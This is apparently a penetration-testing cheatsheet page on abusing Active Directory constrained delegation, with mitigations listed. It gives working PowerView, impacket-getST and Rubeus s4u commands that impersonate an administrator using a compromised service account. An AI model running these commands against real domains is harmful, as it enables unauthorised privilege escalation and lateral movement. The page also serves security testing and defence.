Constrained Delegation
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
Constrained Delegation allows a service to impersonate users to specific destination services. When configured, an attacker who compromises the service account can request TGS tickets for any user to the delegated services, enabling lateral movement.
Constrained delegation abuse is a critical escalation path from service compromise to domain-wide access.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Constrained Delegation:
Get-NetUser -TrustedToAuth (PowerView)Get-NetComputer -TrustedToAuth (PowerView)impacket-getST -dc-ip 10.10.10.10 -spn MSSQLSvc/sql.target.local -impersonate administrator domain.local/serviceuser:passwordRubeus.exe s4u /user:svc_account /rc4:<hash> /impersonateuser:Administrator /msdsspn:"MSSQLSvc/sql.target.local" /pttTools & Techniques
Recommended tools for Constrained Delegation:
- PowerView: identify accounts with constrained delegation
- Impacket getST: request S4U2Proxy tickets
- Rubeus s4u: perform S4U impersonation
- Requires: service account credentials or hash
Prevention & Mitigation
Security recommendations to prevent Constrained Delegation:
- Use Group Managed Service Accounts (gMSA) for services
- Restrict delegation to only required services
- Monitor for unusual TGS requests (Event ID 4769)
- Use resource-based delegation instead of constrained
- Limit service account privileges
References
Additional resources: